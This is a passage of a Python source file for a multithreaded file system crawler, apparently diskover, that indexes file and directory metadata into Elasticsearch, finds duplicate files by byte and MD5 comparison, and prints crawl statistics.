u'.*' \\\n in CONFIG['excluded_dirs']:\n if VERBOSE:\n LOGGER.info('Skipping (.* dir) %s', path)\n with lock:\n total_dirs_skipped += 1\n return True\n else:\n return False\n\n\ndef start_crawl(path, crawlbot=False):\n \"\"\"This is the start crawl function.\n It starts crawling the tree from the top rootdir\n using scandir.walk and adds directories to\n the Queue.\n \"\"\"\n\n LOGGER.info('Starting crawl using %s threads', CLIARGS['threads'])\n\n try:\n # set maxdepth level\n level = CLIARGS['maxdepth']\n # set current depth\n num_sep = path.count(os.path.sep)\n # check for reindex (non-recursive) or crawlbot\n if CLIARGS['reindex'] or crawlbot:\n level = 1\n\n if CLIARGS['breadthfirst']: # breadth-first crawl\n LOGGER.info(\n 'Walking tree (breadth-first, maxdepth:%s)'\n % level)\n for root, dirs, files in walk(path):\n depth = root.count(os.path.sep) - num_sep # priority\n excluded = check_dir_excludes(root)\n if excluded is False:\n if VERBOSE:\n LOGGER.info(\"Adding path to queue: %s (depth:%s)\",\n root, depth)\n q.put((depth, root))\n elif excluded is True:\n del dirs[:]\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n del dirs[:]\n\n else: # depth-first (default)\n for root, dirs, files in walk(path):\n excluded = check_dir_excludes(root)\n if excluded is False:\n if VERBOSE:\n LOGGER.info('Adding path to queue: %s', root)\n # add directory to queue\n q.put(root)\n elif excluded is True:\n del dirs[:]\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n del dirs[:]\n\n # put None into the queue to trigger final ES bulk operations\n for i in range(int(CLIARGS['threads'])):\n if CLIARGS['breadthfirst']:\n q.put((9999, None))\n else:\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n if CLIARGS['breadthfirst']:\n q.put((9999, None))\n else:\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_crawl(path, crawlbot=False):\n \"\"\"This is the worker setup function for directory crawling.\n It sets up the worker threads to process items in the Queue.\n 
crawloop is set to True if running in bot mode.\n \"\"\"\n threads = []\n\n # set up the threads and start them\n for i in range(int(CLIARGS['threads'])):\n # create thread\n t = threading.Thread(target=crawl_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n # set unicode path for python2\n if not IS_PY3:\n path = unicode(path)\n\n if not CLIARGS['reindex'] and not CLIARGS['reindexrecurs'] and not crawlbot:\n # add crawl stats to ES\n add_crawl_stats(STARTTIME)\n # add disk space info to ES\n add_diskspace(path)\n\n # start crawling the path\n start_crawl(path, crawlbot)\n\n\ndef worker_setup_dirsizes(dirlist, crawlbot=False):\n \"\"\"This is the directory sizes worker setup function.\n It sets up the worker threads to process the directory list Queue\n for calculating total directory sizes and item counts in ES.\n \"\"\"\n global total_dirs\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=dirsize_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Calculating directory sizes')\n\n try:\n for d in dirlist:\n q.put(d)\n total_dirs += 1\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n if crawlbot and not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_copytags(dirlist, filelist):\n \"\"\"This is the copy tags worker setup function.\n It sets up the worker threads to process the directory and file list Queue\n for copying directory and file tags from index2 to index in ES.\n \"\"\"\n global total_dirs\n global total_files\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=copytag_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Copying tags from %s to %s', CLIARGS['copytags'][0], CLIARGS['index'])\n\n try:\n for d in dirlist:\n q.put(d)\n total_dirs += 1\n for f in filelist:\n q.put(f)\n total_files += 1\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_dupes():\n \"\"\"This is the duplicate file worker setup function.\n It sets up the worker threads to process the duplicate file list Queue.\n \"\"\"\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=dupes_worker, args=(i,))\n t.daemon = True\n t.start()\n 
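# Note: every worker pool in this script uses the same poison-pill shutdown: each worker\n        # loops on q.get() and breaks out of its infinite loop when it pulls a None sentinel,\n        # and the setup code enqueues one None per thread once all real work items are queued.\n        # Reduced to a sketch (handle() is a placeholder name):\n        #     while True:\n        #         item = q.get()\n        #         if item is None:\n        #             q.task_done()\n        #             break\n        #         handle(item)\n        #         q.task_done()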
threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Searching %s for duplicate file hashes', CLIARGS['index'])\n\n try:\n # look in ES for duplicate files (same filehash) and add to queue\n dupes_finder()\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef dupes_worker(threadnum):\n \"\"\"This is the duplicate file worker thread function.\n It processes items in the dupes group Queue one after another.\n \"\"\"\n dupelist = []\n\n while True:\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next filehash group',\n threadnum)\n\n # get an item (hashkey) from the queue\n hashkey = q.get()\n\n if hashkey is None:\n # add any remaining to ES\n if len(dupelist) > 0:\n # update existing index and tag dupe files dupe_md5 field\n index_tag_dupe(threadnum, dupelist)\n del dupelist[:]\n update_progress(finished=True)\n # end thread's infinite loop\n q.task_done()\n break\n else:\n # find all files in ES matching hashkey\n hashgroup = populate_hashgroup(hashkey)\n # process the duplicate files in hashgroup and return dupelist\n dupelist = tag_dupes(threadnum, hashgroup, dupelist)\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef elasticsearch_connect():\n \"\"\"This is the Elasticsearch connect function.\n It creates the connection to Elasticsearch and returns ES instance.\n \"\"\"\n LOGGER.info('Connecting to Elasticsearch')\n # Check if we are using AWS ES\n if CONFIG['aws'] == \"True\":\n es = Elasticsearch(\n hosts=[{'host': CONFIG['es_host'], 'port': CONFIG['es_port']}],\n use_ssl=True, verify_certs=True,\n connection_class=RequestsHttpConnection,\n timeout=CONFIG['es_timeout'], maxsize=CONFIG['es_maxsize'],\n max_retries=CONFIG['es_max_retries'], retry_on_timeout=True)\n # Local connection to ES\n else:\n es = Elasticsearch(\n hosts=[{'host': CONFIG['es_host'], 'port': CONFIG['es_port']}],\n http_auth=(CONFIG['es_user'], CONFIG['es_password']),\n connection_class=Urllib3HttpConnection,\n timeout=CONFIG['es_timeout'], maxsize=CONFIG['es_maxsize'],\n max_retries=CONFIG['es_max_retries'], retry_on_timeout=True)\n # ping check Elasticsearch\n if not es.ping():\n LOGGER.error('Error connecting to Elasticsearch')\n sys.exit(1)\n return es\n\n\ndef index_create():\n \"\"\"This is the ES index create function.\n It checks for existing index and deletes if\n there is one with same name. 
It also creates\n the new index and sets up mappings.\n \"\"\"\n LOGGER.info('Checking ES index: %s', CLIARGS['index'])\n # check for existing es index\n if ES.indices.exists(index=CLIARGS['index']):\n # check if nodelete, reindex, cli argument\n # and don't delete existing index\n if CLIARGS['reindex']:\n LOGGER.info('Reindexing (non-recursive, preserving tags)')\n return\n elif CLIARGS['reindexrecurs']:\n LOGGER.info('Reindexing (recursive, preserving tags)')\n return\n elif CLIARGS['nodelete']:\n LOGGER.info('Adding to ES index')\n return\n # delete existing index\n else:\n LOGGER.warning('ES index exists, deleting')\n ES.indices.delete(index=CLIARGS['index'], ignore=[400, 404])\n # set up es index mappings and create new index\n mappings = {\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"path_analyzer\": {\n \"tokenizer\": \"path_tokenizer\"\n }\n },\n \"tokenizer\": {\n \"path_tokenizer\": {\n \"type\": \"path_hierarchy\"\n }\n }\n }\n },\n \"mappings\": {\n \"diskspace\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"total\": {\n \"type\": \"long\"\n },\n \"used\": {\n \"type\": \"long\"\n },\n \"free\": {\n \"type\": \"long\"\n },\n \"available\": {\n \"type\": \"long\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"crawlstat_start\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"start_time\": {\n \"type\": \"date\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"crawlstat_stop\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"stop_time\": {\n \"type\": \"date\"\n },\n \"elapsed_time\": {\n \"type\": \"long\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"directory\": {\n \"properties\": {\n \"filename\": {\n \"type\": \"keyword\"\n },\n \"path_parent\": {\n \"type\": \"keyword\",\n \"fields\": {\n \"tree\": {\n \"type\": \"text\",\n \"analyzer\": \"path_analyzer\"\n }\n }\n },\n \"filesize\": {\n \"type\": \"long\"\n },\n \"items\": {\n \"type\": \"long\"\n },\n \"owner\": {\n \"type\": \"keyword\"\n },\n \"group\": {\n \"type\": \"keyword\"\n },\n \"last_modified\": {\n \"type\": \"date\"\n },\n \"last_access\": {\n \"type\": \"date\"\n },\n \"last_change\": {\n \"type\": \"date\"\n },\n \"tag\": {\n \"type\": \"keyword\"\n },\n \"tag_custom\": {\n \"type\": \"keyword\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"file\": {\n \"properties\": {\n \"filename\": {\n \"type\": \"keyword\"\n },\n \"extension\": {\n \"type\": \"keyword\"\n },\n \"path_parent\": {\n \"type\": \"keyword\",\n \"fields\": {\n \"tree\": {\n \"type\": \"text\",\n \"analyzer\": \"path_analyzer\"\n }\n }\n },\n \"filesize\": {\n \"type\": \"long\"\n },\n \"owner\": {\n \"type\": \"keyword\"\n },\n \"group\": {\n \"type\": \"keyword\"\n },\n \"last_modified\": {\n \"type\": \"date\"\n },\n \"last_access\": {\n \"type\": \"date\"\n },\n \"last_change\": {\n \"type\": \"date\"\n },\n \"hardlinks\": {\n \"type\": \"integer\"\n },\n \"inode\": {\n \"type\": \"long\"\n },\n \"filehash\": {\n \"type\": \"keyword\"\n },\n \"tag\": {\n \"type\": \"keyword\"\n },\n \"tag_custom\": {\n \"type\": \"keyword\"\n },\n \"dupe_md5\": {\n \"type\": \"keyword\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n },\n \"indexing_thread\": {\n \"type\": \"integer\"\n }\n }\n }\n }\n }\n\n # check plugins for additional mappings\n for plugin in plugins:\n mappings = (plugin.add_mappings(mappings))\n\n LOGGER.info('Creating ES index')\n ES.indices.create(index=CLIARGS['index'], 
body=mappings)\n\n\ndef index_add_files(threadnum, filelist):\n \"\"\"This is the ES index add files function.\n It bulk adds file meta data from worker's crawl\n results into ES.\n \"\"\"\n if VERBOSE:\n LOGGER.info('[thread-%s]: Bulk adding files to ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n # bulk load data to Elasticsearch index\n helpers.bulk(ES, filelist, index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_add_dirs(threadnum, dirlist):\n \"\"\"This is the ES index add directories function.\n It bulk adds directory meta data from worker's crawl\n results into ES.\n \"\"\"\n if VERBOSE:\n LOGGER.info(\n '[thread-%s]: Bulk adding directories to ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n # bulk load data to Elasticsearch index\n helpers.bulk(ES, dirlist, index=CLIARGS['index'], doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_delete_file(file_dict):\n \"\"\"This is the ES delete file function.\n It finds all files that have same path and deletes them from ES.\n Only intended to delete single file, use index_delete_path for bulk delete\n of files in same directory.\n \"\"\"\n global reindex_file_list\n\n # get the file id\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \\\"\" + file_dict['path_parent'] + \"\\\" \\\n AND filename: \\\"\" + file_dict['filename'] + \"\\\"\"\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n for hit in res['hits']['hits']:\n # store any tags\n reindex_file_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # delete the file in ES\n ES.delete(index=CLIARGS['index'], doc_type=\"file\", id=hit['_id'])\n\n\ndef index_delete_path(path, recursive=False, crawlbot=False):\n \"\"\"This is the ES delete path bulk function.\n It finds all file and directory docs in path and deletes them from ES\n including the directory (path).\n Recursive will also find and delete all docs in subdirs of path.\n Stores any existing tags in reindex_file_list or reindex_dir_list.\n \"\"\"\n global reindex_file_list\n global reindex_dir_list\n file_id_list = []\n dir_id_list = []\n file_delete_list = []\n dir_delete_list = []\n\n # file doc search\n\n if recursive:\n # escape special characters\n newpath = escape_chars(path)\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n }\n }\n else:\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \\\"\" + path + \"\\\"\"\n }\n }\n }\n\n LOGGER.info('Searching for all files in %s' % path)\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', scroll='1m',\n size=1000, body=data,\n request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n # add doc id to file_id_list\n 
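# Note: this search/scroll loop is the standard Elasticsearch pagination pattern used\n            # throughout this file: the initial search opens a short-lived scroll window, then\n            # ES.scroll() is called with the returned scroll id until a page comes back empty.\n            # Reduced to a sketch (idx, dt, query and consume() are placeholder names):\n            #     res = ES.search(index=idx, doc_type=dt, scroll='1m', size=1000, body=query)\n            #     while res['hits']['hits']:\n            #         consume(res['hits']['hits'])\n            #         res = ES.scroll(scroll_id=res['_scroll_id'], scroll='1m')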
file_id_list.append(hit['_id'])\n # add file path info inc. tags to reindex_file_list\n reindex_file_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s files in %s' % (len(file_id_list), path))\n\n # add file id's to delete_list\n for i in file_id_list:\n d = {\n '_op_type': 'delete',\n '_index': CLIARGS['index'],\n '_type': 'file',\n '_id': i\n }\n file_delete_list.append(d)\n\n if (len(file_id_list) > 0 or crawlbot):\n # bulk delete files in ES\n LOGGER.info('Bulk deleting files in ES index')\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_delete_list, index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n # directory doc search\n if recursive:\n # escape special characters\n newpath = escape_chars(path)\n data = {\n 'query': {\n 'query_string': {\n 'query': '(path_parent: ' + newpath + ' OR \\\n path_parent: ' + newpath + '\\/*) OR (filename: \"'\n + os.path.basename(path) + '\" AND path_parent: \"'\n + os.path.abspath(os.path.join(path, os.pardir)) + '\")',\n 'analyze_wildcard': 'true'\n }\n }\n }\n else:\n data = {\n 'query': {\n 'query_string': {\n 'query': '(path_parent: \"' + path + '\") OR (filename: \"'\n + os.path.basename(path) + '\" AND path_parent: \"'\n + os.path.abspath(os.path.join(path, os.pardir)) + '\")'\n }\n }\n }\n\n LOGGER.info('Searching for all directories in %s' % path)\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='directory', scroll='1m',\n size=1000, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n # add directory doc id to dir_id_list\n dir_id_list.append(hit['_id'])\n # add directory path info inc. 
tags to reindex_dir_list\n reindex_dir_list.append([hit['_source']['path_parent'] +\n '/' + hit['_source']['filename'],\n hit['_source']['tag'],\n hit['_source']['tag_custom']])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s directories in %s' % (len(dir_id_list), path))\n\n # add dir id's to delete_list\n for i in dir_id_list:\n d = {\n '_op_type': 'delete',\n '_index': CLIARGS['index'],\n '_type': 'directory',\n '_id': i\n }\n dir_delete_list.append(d)\n\n if (len(dir_id_list) > 0 or crawlbot):\n # bulk delete directories in ES\n LOGGER.info('Bulk deleting directories in ES index')\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_delete_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_get_docs(doctype='directory', path=None):\n \"\"\"This is the ES get docs function.\n It finds all docs (by doctype) in ES if no path provided or\n will find all docs in path (non-recursive) and returns doclist\n which contains doc id, fullpath and mtime for all docs.\n \"\"\"\n doclist = []\n\n if not path:\n LOGGER.info('Searching for all %s docs in index', doctype)\n # doc search\n data = {\n '_source': ['path_parent', 'filename', 'last_modified'],\n 'query': {\n 'match_all': {}\n }\n }\n else:\n LOGGER.info('Searching for %s in %s', doctype, path)\n pd = os.path.abspath(os.path.join(path, os.pardir))\n f = os.path.basename(path)\n # directory doc search\n data = {\n '_source': ['path_parent', 'filename', 'last_modified'],\n 'query': {\n 'query_string': {\n 'query': 'path_parent: \"' + path + '\" OR \\\n (path_parent: \"' + pd + '\" AND filename: \"' + f + '\")'\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type=doctype, scroll='1m',\n size=1000, body=data, request_timeout=CONFIG['es_timeout'])\n\n while res['hits']['hits'] and len(res['hits']['hits']) > 0:\n for hit in res['hits']['hits']:\n docid = hit['_id']\n fullpath = hit['_source']['path_parent'] + '/' + hit['_source']['filename']\n # convert es time to unix time format\n mtime = time.mktime(datetime.strptime(\n hit['_source']['last_modified'],\n '%Y-%m-%dT%H:%M:%S').timetuple())\n doclist.append([docid, fullpath, mtime, doctype])\n # get ES scroll id\n scroll_id = res['_scroll_id']\n # use ES scroll api\n res = ES.scroll(scroll_id=scroll_id, scroll='1m',\n request_timeout=CONFIG['es_timeout'])\n\n LOGGER.info('Found %s %s docs' % (len(doclist), doctype))\n\n return doclist\n\n\ndef index_tag_dupe(threadnum, dupelist):\n \"\"\"This is the ES dupe_md5 tag update function.\n It updates a file's dupe_md5 field to be md5sum of file\n if it's marked as a duplicate.\n \"\"\"\n file_id_list = []\n # bulk update data in Elasticsearch index\n for item in dupelist:\n for f in item['files']:\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': 'file',\n '_id': f['id'],\n 'doc': {'dupe_md5': item['filehash']}\n }\n file_id_list.append(d)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Bulk updating files in ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_id_list, 
index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef tag_dupes(threadnum, hashgroup, dupelist):\n \"\"\"This is the duplicate file tagger.\n It processes files in hashgroup to verify if they are duplicate.\n The first few bytes at beginning and end of files are\n compared and if same, a md5 check is run on the files.\n If the files are duplicate, their dupe_md5 field\n is updated to their md5sum.\n \"\"\"\n global total_dupes\n\n if VERBOSE:\n LOGGER.info('[thread-%s] Processing %s files in hashgroup: %s',\n threadnum, len(hashgroup['files']), hashgroup['filehash'])\n\n # Add first and last few bytes for each file to dictionary\n if VERBOSE:\n LOGGER.info('[thread-%s] Comparing bytes', threadnum)\n\n # create a new dictionary with files that have same byte hash\n hashgroup_bytes = {}\n for file in hashgroup['files']:\n if VERBOSE:\n LOGGER.info('[thread-%s] Checking bytes: %s'\n % (threadnum, file['filename']))\n try:\n f = open(file['filename'], 'rb')\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s] Error opening file',\n threadnum, exc_info=True)\n continue\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error opening file',\n threadnum, exc_info=True)\n continue\n # check if files is only 1 byte\n try:\n bytes_f = base64.b64encode(f.read(2))\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n '[thread-%s] Can\\'t read first 2 bytes, trying first byte',\n threadnum, exc_info=True)\n pass\n try:\n bytes_f = base64.b64encode(f.read(1))\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error reading bytes, giving up',\n threadnum, exc_info=True)\n continue\n try:\n f.seek(-2, os.SEEK_END)\n bytes_l = base64.b64encode(f.read(2))\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n '[thread-%s] Can\\'t read last 2 bytes, trying last byte',\n threadnum, exc_info=True)\n pass\n try:\n f.seek(-1, os.SEEK_END)\n bytes_l = base64.b64encode(f.read(1))\n except Exception:\n if VERBOSE:\n LOGGER.error('[thread-%s] Error reading bytes, giving up',\n threadnum, exc_info=True)\n continue\n f.close()\n\n # create hash of bytes\n bytestring = str(bytes_f) + str(bytes_l)\n bytehash = hashlib.md5(bytestring.encode('utf-8')).hexdigest()\n\n if VERBOSE:\n LOGGER.info('[thread-%s] Byte hash: %s', threadnum, bytehash)\n\n # create new key for each bytehash and\n # set value as new list and add file\n hashgroup_bytes.setdefault(bytehash, []).append(file['filename'])\n\n # remove any bytehash key that only has 1 item (no duplicate)\n for key, value in list(hashgroup_bytes.items()):\n if len(value) < 2:\n filename = value[0]\n if VERBOSE:\n LOGGER.info(\n '[thread-%s] Unique file (bytes diff), removing: %s',\n threadnum, filename)\n del hashgroup_bytes[key]\n # remove file from hashgroup\n for i in range(len(hashgroup['files'])):\n if hashgroup['files'][i]['filename'] == filename:\n del hashgroup['files'][i]\n break\n\n # run md5 sum check if bytes were same\n hashgroup_md5 = {}\n # do md5 check on files with same byte hashes\n for key, value in list(hashgroup_bytes.items()):\n if VERBOSE:\n LOGGER.info('[thread-%s] Comparing MD5 sums for filehash: %s',\n threadnum, key)\n for filename in value:\n if VERBOSE:\n LOGGER.info('[thread-%s] Checking MD5: %s',\n threadnum, filename)\n # get md5 sum, don't load whole file into memory,\n # load in x KB at a time\n try:\n read_size = CONFIG['md5_readsize']\n md5sum = hashlib.md5()\n with open(filename, 'rb') as f:\n data = 
f.read(read_size)\n while data:\n md5sum.update(data)\n data = f.read(read_size)\n md5sum = md5sum.hexdigest()\n if VERBOSE:\n LOGGER.info('[thread-%s] MD5: %s', threadnum, md5sum)\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s] Error checking file',\n threadnum, exc_info=True)\n continue\n\n # create new key for each md5sum and set value as new list and\n # add file\n hashgroup_md5.setdefault(md5sum, []).append(filename)\n\n # remove any md5sum key that only has 1 item (no duplicate)\n for key, value in list(hashgroup_md5.items()):\n if len(value) < 2:\n filename = value[0]\n if VERBOSE:\n LOGGER.info('[thread-%s] Unique file (MD5 diff), removing: %s',\n threadnum, filename)\n del hashgroup_md5[key]\n # remove file from hashgroup\n for i in range(len(hashgroup['files'])):\n if hashgroup['files'][i]['filename'] == filename:\n del hashgroup['files'][i]\n break\n\n if len(hashgroup['files']) >= 2:\n if VERBOSE:\n LOGGER.info('[thread-%s] Found %s dupes in hashgroup',\n threadnum, len(hashgroup['files']))\n # add hashgroup to dupelist\n dupelist.append(hashgroup)\n\n # add dupe_count to totals\n with lock:\n total_dupes += len(hashgroup['files'])\n\n # bulk add to ES once we reach max chunk size\n if len(dupelist) >= CONFIG['es_chunksize']:\n # update existing index and tag dupe files dupe_md5 field\n index_tag_dupe(threadnum, dupelist)\n del dupelist[:]\n\n return dupelist\n\n\ndef populate_hashgroup(key):\n \"\"\"Searches ES for all files matching hashgroup key (filehash)\n and returns dict containing matching files.\n \"\"\"\n global dupe_count\n\n hashgroup_files = []\n\n data = {\n \"_source\": [\"path_parent\", \"filename\"],\n \"query\": {\n \"bool\": {\n \"must\": {\n \"term\": {\"filehash\": key}\n }\n }\n }\n }\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n res = ES.search(index=CLIARGS['index'], doc_type='file', size=\"1000\",\n body=data, request_timeout=CONFIG['es_timeout'])\n\n # add any hits to hashgroups\n for hit in res['hits']['hits']:\n hashgroup_files.append(\n {'id': hit['_id'],\n 'filename': hit['_source']['path_parent'] + \"/\" +\n hit['_source']['filename']})\n dupe_count += 1\n\n # add filehash group to queue\n fhg = {'filehash': key, 'files': hashgroup_files}\n\n return fhg\n\n\ndef dupes_finder():\n \"\"\"This is the duplicate file finder function.\n It searches Elasticsearch for files that have the same filehashes\n and adds file hash groups to Queue.\n \"\"\"\n global total_hash_groups\n\n # find the filehashes with largest files and add filehash keys\n # to hashgroups\n data = {\n \"size\": 0,\n \"query\": {\n \"bool\": {\n \"must\": {\n \"term\": {\"hardlinks\": 1}\n },\n \"filter\": {\n \"range\": {\n \"filesize\": {\"gte\": CLIARGS['minsize']}\n }\n }\n }\n },\n \"aggs\": {\n \"dupe_filehash\": {\n \"terms\": {\n \"field\": \"filehash\",\n \"min_doc_count\": 2,\n \"size\": 10000,\n \"order\": {\"max_file_size\": \"desc\"}\n },\n \"aggs\": {\n \"max_file_size\": {\"max\": {\"field\": \"filesize\"}}\n }\n }\n }\n }\n\n # refresh index\n ES.indices.refresh(index=CLIARGS['index'])\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # add hash keys to Queue\n for bucket in res['aggregations']['dupe_filehash']['buckets']:\n total_hash_groups += 1\n q.put(bucket['key'])\n\n\ndef get_time(seconds):\n \"\"\"This is the get time function\n It returns human readable time format for stats.\n \"\"\"\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n return 
\"%dh:%02dm:%02ds\" % (h, m, s)\n\n\ndef convert_size(size_bytes):\n \"\"\"This is the convert size function\n It returns human readable file sizes.\n \"\"\"\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\ndef print_stats(stats_type):\n \"\"\"This is the print stats function\n It outputs stats at the end of runtime.\n \"\"\"\n elapsedtime = time.time() - STARTTIME\n if stats_type is \"crawl\":\n # add stats to ES\n add_crawl_stats(STARTTIME, time.time(), elapsedtime)\n sys.stdout.flush()\n LOGGER.disabled = True\n\n if stats_type is 'crawl':\n sys.stdout.write(\"\\n\\033[%s********************************* \\\nCRAWL STATS *********************************\\033[0m\\n\" % BANNER_COLOR)\n sys.stdout.write(\"\\033[%s Directories: %s\\033[0m\" % (BANNER_COLOR,\n total_dirs))\n sys.stdout.write(\"\\033[%s / Skipped: %s\\033[0m\\n\" % (\n BANNER_COLOR, total_dirs_skipped))\n sys.stdout.write(\n \"\\033[%s Files: %s (%s)\\033[0m\"\n % (BANNER_COLOR, total_files, convert_size(total_file_size)))\n sys.stdout.write(\n \"\\033[%s / Skipped: %s (%s)\\033[0m\\n\"\n % (BANNER_COLOR, total_files_skipped,\n 